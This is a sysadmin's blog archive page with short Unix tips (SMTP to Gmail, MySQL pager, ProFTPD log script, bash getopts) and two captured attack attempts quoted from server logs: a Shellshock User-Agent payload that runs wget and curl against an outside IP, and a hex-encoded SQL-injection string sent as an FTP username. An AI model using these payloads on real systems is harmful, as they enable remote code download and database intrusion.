Recently in Unix Category

Proving one is Elite

| No Comments | No TrackBacks

You know you're skilled as a hacker when you're so fast, you don't even need to configure your scanning scripts:

106.51.29.122 - - [01/Aug/2016:13:49:38 -0400] ***.******.*** "GET HTTP/1.1 HTTP/1.1" 400 340 "-" "() 
{ :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://185.125.4.222/YOUR_URL_HERE ;
curl -O http://185.125.4.222/YOUR_URL_HERE ; fetch http://185.125.4.222/YOUR_URL_HERE\");'"

They're trying to use a the Shellshock vulnerability I think.

Stupid Linux Tricks

| No Comments | No TrackBacks
tcp        0      0 XX.XX.XX.XX:44101         XX.XX.XX.XX:1521          ESTABLISHED 

That is Java's Oracle driver choosing a source port at random, which is what it does all the time. Only this time the port chosen is used by Java's RMI, so a different app was unable to startup, it failed when trying to bind to port 44101. Of course Oracle connections come and go, so with no user action, the problem went away in about 10 minutes

A

Manual SMTP to GMail

| No Comments | No TrackBacks

Google has started requiring incoming mail to comply with more of RFC2822, particularly with respect to headers; to wit they won't accept incoming mail without a "From:" header. If you try to send without on, you'll get a rejection like this:

this message is not RFC 2822 compliant. To reduce the amount of spam
5.7.1 sent to Gmail, this message has been blocked. Please review
5.7.1 RFC 2822 specifications for more information. iw4si27447595pac.153 - gsmtp

This isn't an issue when you use a mail client, but if you're manually entering SMTP commands, it adds an extra requirement.  The following is a conforming session, or at least conforming enough -- the RFC requires a Date header as well, but Google isn't enforcing that

$ telnet smtp-server 25
220 SMTP_SERVER Microsoft ESMTP MAIL Service ready at Thu, 27 Jun 2013 22:45:15 -0400
helo
250 SMTP_SERVER Hello [10.103.13.44]
mail from: my_address@domain
250 2.1.0 Sender OK
rcpt to: target_address@domain.gmail.com
250 2.1.5 Recipient OK
data
354 Start mail input; end with <CRLF>.<CRLF>
From: ME
Subject: testing SMTP

this is a test

(props to)
A

Neat little MySQL trick:

mysql> \P grep -v Sleep
PAGER set to 'grep -v Sleep'

filters out the idle connections from the output of 'show processlist'

A

Fun with FTP Logs

| No Comments | No TrackBacks

Had to do some work with ProFTPD logs today.  This script was created to get the date of last login of a user, or a list of multiple users, and return that data as a .csv file.  If you have customized the log formats, you may need to tweek the regex that breaks apart the line. 

get_last_login.pl

Several bits are incomplete, including the proper handling of timezone offsets and usage text in the help routine, but it works if you pass it a logfile and either a name or a namefile

$ get_last_login.pl --log=auth.log --namefile=username_list.txt > last_login.csv

or

$ get_last_login.pl --log=auth.log --name=am_user > last_login.csv

In doing this work, I noticed something fun, people are now trying SQL injection through FTP:

ProFTPD Default Installation [32717] ###.###.###.### [24/Feb/2013:00:16:23 -0500] "USER %') 
UNION SELECT 1,concat(0x7b,0x6d,0x64,0x35,0x7d,0x78,0x4d,0x70,0x43,0x4f,0x4b,0x43,0x35,0x49,0x34,0x49,0x4e,
0x7a,0x46,0x43,0x61,0x62,0x33,0x57,0x45,0x6d,0x77,0x3d,0x3d),NULL,NULL,concat(0x2f),concat(0x2f,0x62,0x69,
0x6e,0x2f,0x73,0x68) #" 331

A

Helpful hint, if you have a bash script with a function calling getopts, i.e.

make_tarball() {
    local START=`get_start_time`
    ## declare some variables
.....
    local OPTARG OPTIND
    ## Parse the args
    while getopts "s:d:a:x:X:v" ARG
    do
	case $ARG in
	    s) SOURCE_PATH="$SOURCE_PATH $OPTARG"
		;;
....
        esac
   done

you MUST make OPTIND a local variable, or a second (third, etc) call to the function will fail, with OPTIND too large to see any of the arguments

blegh
A

About this Archive

This page is an archive of recent entries in the Unix category.

Find recent content on the main index or look in the archives to find all content.

OpenID accepted here Learn more about OpenID